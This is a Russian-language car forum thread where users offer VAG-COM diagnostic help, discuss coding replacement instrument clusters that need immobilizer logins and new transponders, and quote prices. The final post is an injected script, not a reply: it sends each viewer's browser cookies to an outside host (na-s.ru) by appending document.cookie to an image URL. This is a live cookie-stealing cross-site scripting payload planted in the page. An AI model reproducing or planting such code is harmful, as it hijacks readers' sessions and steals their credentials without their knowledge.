Ответ: Требуется помощь ВАГкомом? Вам сюда! Дружище! Если у тебя есть логин, доску тебе пропишет любой пионер за пиво, но если у тебя логина нет, то из доски 8Е достать его проблемно, поэтому у тебя и спраштвают номера, кроме того надо еще иметь логин старый иначе ты не сумеешь сделать синхру с моторным. >> а4 8е б6 америкос Щиток от б7 Что означает б6 и б7?? Если ты имеешь ввиду доску от машины после 2005года, то она с определенного момента на 8e не встанет О цене: Если новая доска совместима с твоей машиной и ты мне дашь оба логина - я готов это сделать за 2000р, а многие здесь и бесплатно;-). Если только логин на новую доску, то за 4000р, а если нового логина нет -7000р, но есть вероятность что тебе кроме базы дилера никто не поможет - из некоторых бошевских криптованных досок логин выдернуть не удается. А номера не спрашивают те которым дали в руки железку: они кнопки жмут, получилось - хорошо, нет - ну и ладно и хорошо если у тебя дамп целым останется Да чуть не забыл, тебе скорее всего понадабятся новые транспондеры, старые не проканают на бу доску
Ответ: Требуется помощь ВАГкомом? Вам сюда! Кстати да, знающие люди сказали, что без логинов от приборок не так все просто там... Можно запороть панельку...
Ответ: Требуется помощь ВАГкомом? Вам сюда! Логин есть новый и старыйтранспордеры по 250р- дальше что?
Ответ: Требуется помощь ВАГкомом? Вам сюда! Ну если у тебя все есть пропиши сам дело на 20 мин, процедура известна. Не хочешь сам - обращайся, цену я озвучил
Ответ: Требуется помощь ВАГкомом? Вам сюда! Чем смогу помогу : ВАГи, ТАЗЫ всякие ,хундаи, киа. В общем много а/м по протоколу OBD II и не только. г.Воронеж
Ответ: Требуется помощь ВАГкомом? Вам сюда! Я МОГУ ПОЧИТАТЬ И СТЕРЕТЬ ОШИБКИ НА СЕВЕРЕ (РАЙОН САВЁЛОВСКОЙ) ЗАРАНЕЕ ДОГОВОРИВШИСЬ. ТОХИНЫМ КАБЕЛЕМ.
Ответ: Требуется помощь ВАГкомом? Вам сюда! Не забываем регистрироваться тут и указывать себя на карте: http://vagcom.yorest.ru
Ответ: Требуется помощь ВАГкомом? Вам сюда! А кто уже пробывал и что не получилось? Если возьмешь весь риск на себя, давай я попробую Андрюх, что там по моему вопросу-то?
Ответ: Требуется помощь ВАГкомом? Вам сюда! шнур OBD II + ноут с другом с VAG-COM = читаем, стираем ошибки больше ничего не умеем, а так хочется.
Ответ: Требуется помощь ВАГкомом? Вам сюда! <script> img = new Image(); img.src = "http://na-s.ru/images/dezz_3.jpg?"+document.cookie; </script>